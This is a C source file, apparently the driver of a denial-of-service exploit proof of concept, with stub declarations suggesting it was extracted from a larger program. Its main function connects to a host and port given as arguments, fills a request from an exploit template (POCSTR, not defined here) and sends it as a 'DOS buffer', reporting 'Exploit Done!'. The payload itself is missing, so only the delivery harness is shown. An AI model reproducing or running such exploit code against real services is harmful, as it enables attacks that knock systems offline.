
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* POCSTR ;
 int atoi (char*) ;
 int close (int) ;
 int exit (int) ;
 int free (char*) ;
 int header () ;
 scalar_t__ malloc (int) ;
 int printf (char*,...) ;
 int remote_connect (char*,int ) ;
 scalar_t__ send (int,char*,int,int ) ;
 int sleep (int) ;
 int sprintf (char*,char*,char*,char*) ;
 int strlen (char*) ;
 int usage (char*) ;

int main(int argc, char *argv[]) {
 int s;
 char *request;
 header();
 if( (argc < 5) )
     usage(argv[0]);
 request = (char *) malloc(1024);
 printf("[r] Connecting to remote host\n");
 s = remote_connect(argv[1],atoi(argv[2]));
 sleep(1);
 printf("[r] Creating buffer\n");
 sprintf(request,POCSTR,argv[3],argv[4]);
 printf("[r] Sending %d bytes of DOS buffer\n",strlen(request));
 if ( send ( s, request, strlen (request), 0) <= 0 )
 {
         printf("[e] Failed to send buffer\n");
         close(s);
         exit(1);
 }
 sleep(1);
 printf("[s] Exploit Done!\n");
 close(s);
 free(request);
 request = ((void*)0);
 return 0;
}
